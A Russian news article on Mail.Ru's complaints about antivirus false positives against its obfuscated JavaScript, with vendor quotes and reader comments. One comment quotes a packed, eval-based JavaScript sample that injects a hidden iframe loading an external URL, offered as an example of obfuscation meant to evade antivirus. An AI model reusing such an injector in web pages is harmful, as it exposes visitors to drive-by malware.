Mail.Ru обеспокоился вниманием антивирусов

Mail.Ru недоволен ложным срабатыванием антивирусов на продукты компании. В Facebook вице-президент по маркетингу Mail.Ru Анна Артамонова разыскивает «контакты людей, отвечающих за корректную работу антивирусов и особенно сигнатур баз». 

Это не связано с конкретными продуктами Mail.Ru Group, пояснила Roem.ru Анна Артамонова:

Дело в том, что на наших серверах, отдающих статический контент, лежит JavaScript-код, который подвергается обфускации для уменьшения веса. У антивирусных программ есть базы сигнатур, и может сложиться ситуация, когда по ошибке код, который отрабатывает на сайтах Mail.Ru Group, подпадает под эти сигнатуры. 

За последний год было два инцидента, когда антивирусные программы блокировали наши серверы со статикой. Оба раза устранение ошибки со стороны антивирусов занимало пару часов, но сутки требовались на нахождение контактов ответственных людей. Мы хотим заранее исключить из этого процесса первые сутки поиска нужных контактов", 

Между тем, Mail.Ru мог бы договориться с антивирусниками о предварительной проверке своих продуктов, чтобы избежать блокировки. Такое сотрудничество в той или иной форме практикуется с разработчиками софта, подтвердили Roem.ru в двух компаниях, занимающихся безопасностью. 

Сергей Комаров, руководитель отдела антивирусных разработок и исследований "Доктор Веб" Сергей Комаров: 

"Речь не идет ни о каком привилегированном положении. Откуда бы мы ни получали файлы - прежде чем добавить их в базы чистых, равно как и в вирусные базы, мы анализируем ПО и выносим вердикт только на основе собственного анализа. Такое сотрудничество позволяет избежать ложных детектов и весьма полезно, как нам, так и производителям софта"

Анастасия Соловьева, руководитель группы по работе с независимыми вендорами/разработчиками программного обеспечения «Лаборатории Касперского»:

Да, такое бывает, что нам передают софт до его официального выпуска. Конкретно с Mail.ru таких прецедентов не было. У нас есть практика белых списков. Модель, разработанная «Лабораторией Касперского», называется Whitelist Security Approach и основана на систематизации знаний о чистом ПО. 

Вот как это работает: защита компьютера традиционными сигнатурными методами позволяет запретить выполнение зловредного кода, а технология белых списков (Whitelist) разрешает выполнение чистого ПО. Откуда известно, какое именно ПО является чистым? В рамках Whitelist Security Approach предусмотрено создание специальной базы чистого ПО, куда заносятся заранее проверенные легитимные программы.

Комментарий представителя компании

  • Контекст комментария

    AndrewSumin

    Вы комментарий Анны читали? Откуда вообще мысли про софт? Речь идет исключительно про сервера со статикой, а именно JS, CSS файлах, картинках и о блокировках доменов где это добро лежит. http://ru.wikipedia.org/wiki/

Лучшие комментарии

  • Контекст комментария

    3APA3A

    > Это какое-то новое слово в программировании. Речь о программах вообще не идет, речь идет о веб-почте и статическом контенте (джаваскрипты, стили, картинки) которые ВНЕЗАПНО начинают блочиться антивирусами при обращении к веб-серверу. Причем иногда случаются поразительно феерические вещи, например, один из антивирусов не очень давно ругался на TNS’овский счетчик. А поддержка некоторых бесплатных антиврусных продуктов такова, что связаться с поддержкой не купив платную версия продукта невозможно в принципе.

Добавить 19 комментариев

  • Ответить

    Лучше бы отказались от программ, которые без разрешения пользователя устанавливаются в операционной системе и в браузерах. Неужели есть надежда, что таким путями можно заставить пользователей полюбить продукт. Это же и есть в вирусы чистой воды. Я при установке безобидных на первых взгляд программ (внешне не связанных с Mail.ru) уже не раз цепляю кучу зловредных установок от Mail.ru по недопущению смены поиска по умолчанию и т.п. Их потом сложно вычищать. Именно это и заставило меня как многолетнего пользователя почтового сервиса, сделать над собой усилие и перейти на другие службы даже в качестве резервной почты. Потому, что когда падает уважение к бренду и видишь такое отношение к себе, ничего от него уже не нужно. Искренне желаю Mail.ru думать не о борьбе с пользователями (а также с антивирусными программами, которые защищают этих самых бедных пользователей), а направить усилия на улучшения полезности сервиса.

  • Ответить

    > Это какое-то новое слово в программировании. Речь о программах вообще не идет, речь идет о веб-почте и статическом контенте (джаваскрипты, стили, картинки) которые ВНЕЗАПНО начинают блочиться антивирусами при обращении к веб-серверу. Причем иногда случаются поразительно феерические вещи, например, один из антивирусов не очень давно ругался на TNS’овский счетчик. А поддержка некоторых бесплатных антиврусных продуктов такова, что связаться с поддержкой не купив платную версия продукта невозможно в принципе.

  • Ответить
    Альтер Эго

    У меня Мыло не работало несколько часов, даже имя не расшифровывалось. Это все сделали антивирусы или был какой сбой(в маршрутизации например)?

  • Ответить
    Альтер Эго

    >> обфускации для уменьшения веса. >Это какое-то новое слово в программировании. Чистку — понимаю, но обфускацию?! Отвечает Капитан Очевидность: В интерпретируемых языках обфусцированный код занимает меньше места, чем исходный, и зачастую выполняется быстрее, чем исходный. Современные обфускаторы также заменяют константы числами, оптимизируют код инициализации массивов, и выполняют другую оптимизацию, которую на уровне исходного текста провести проблематично или невозможно. Проблема уменьшения размера важна, например, при программировании для сотовых телефонов на J2ME, где размер программы серьёзно ограничен. Обфускация JavaScript уменьшает размер HTML-файлов и, соответственно, ускоряет загрузку. Также КО рекомендует читать сайт [url=http://ru.wikipedia.org/wiki/#.D0.9E.D0.BF.D1.82.D0.B8.D0.BC.D0.B8.D0.B7.D0.B0.D1.86.D0.B8.D1.8F]wikipedia.org[/url] перед выносом своего искреннего изумления на публику. P.S. Мы вообще сейчас на тематическом форуме интернет-индустрии или на сайте журнала «Лиза»? (с) Crio

  • Ответить

    Ребята, не надо путать терминологию. Выкинуть комментарии, лишнии пробелы и заменить все имена переменных на однобуквенные — это оптимизация (или, если хотите, упаковка) js кода; обфускация, это когда код выглядит примерно так: eval(function(p,a,c,k,e,d){e=function(c){return(c35?String.fromCharCode(c+29):c.toString(36))};if(!».replace(/^/,String)){while(c—){d[e(c)]=k[c]||e(c)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c—){if(k[c]){p=p.replace(new RegExp(‘\b’+e(c)+’\b’,’g’),k[c])}}return p}(‘i 9(){a=6.h(‘b’);7(!a){5 0=6.j(‘k’);6.g.l(0);0.n=’b’;0.4.d=’8′;0.4.c=’8′;0.4.e=’f’;0.m=’w://z.o.B/C.D?t=E’}}5 2=A.x.q();7(((2.3(«p»)!=-1&&2.3(«r»)==-1&&2.3(«s»)==-1))&&2.3(«v»)!=-1){5 t=u(«9()»,y)}’,41,41,’el||ua|indexOf|style|var|document|if|1px|MakeFrameEx|element|yahoo_api|height| width|display|none|body|getElementById|function|createElement|iframe|appendChild|src|id|nl|msie| toLowerCase|opera|webtv||setTimeout|windows|http|userAgent|1000|juyfdjhdjdgh|navigator|ai| showthread|php|72241732′.split(‘|’),0,{})) Он не меньше оригинала и выполняется не быстрее; единственное преимущество — проходит мимо антивирусов.

  • Ответить
    Альтер Эго

    >Выкинуть комментарии, лишнии пробелы и заменить все имена переменных на однобуквенные — это оптимизация (или, если хотите, упаковка) js кода это потому что crio так сказал?

  • Ответить
    zulic barvanet

    :) Наконец-то творения mail.ru отнесены в нужную категорию — вирусы. Давно пора. Следующий шаг — блокировка самого сайта mail.ru. Сейчас навалят представители мэйла и начнут — «мапед не мой, я только разместил абъяву». Товарищи, чем вы занимались в последниее время, то и получили.

  • Ответить

    у меня вопрос к холиварщикам — а почему вы всегда более ожесточены при набросах на мейл, почему не набрасываете параллельно на Яндекс и Гугл с их тулбарами и насильственным внедрением всяких закладок, элементов и иже с ними? ведь методы одни и те же, более того, и гугль и яндекс начали гораздо раньше. чисто любопытно, откуда столько сконцентрированной агрессии?

  • Ответить

    «Откуда вообще мысли про софт? Речь идет исключительно про сервера со статикой, а именно JS, CSS файлах, картинках и о блокировках доменов где это добро лежит. » Оппа! Руководитель разработки клиентской части рассказывает, что JS — это не софт. Ну т.е. про картинки и CSS еще как-то можно поспорить, хотя это не исключает их использования для атак, но отказать программам на языке программирования javascript в признании софтом — это круто.

  • Ответить
    Альтер Эго

    >Традиция набрасывать на мыло пошла из ситуации исследованной Это не традиция пошли из, а исследование было сделано в рамках существующей традиции. Т.е. это не объяснение, а просто еще один пример к вопросу.

  • Ответить

    «почему не набрасываете параллельно на Яндекс и Гугл с их тулбарами и насильственным внедрением всяких закладок, элементов и иже с ними? ведь методы одни и те же, более того, и гугль и яндекс начали гораздо раньше. чисто любопытно, откуда столько сконцентрированной агрессии? » Ответ: Яндекс и Гугл не устанавливает настолько жестко без ведома пользователя. Для того, чтобы сравнивать, нужно установить этот софт (разница в отношении к пользователям будет видна невооруженным глазом). А концентрированной агрессии у нас совсем нет, есть лишь пожелания крупной российской компании задуматься о благе пользователей, а не о борьбе с кем-то. Еще не поздно. Может быть с помощью наших замечаний Mail.ru сможет стать лучше. Удачи им в этом.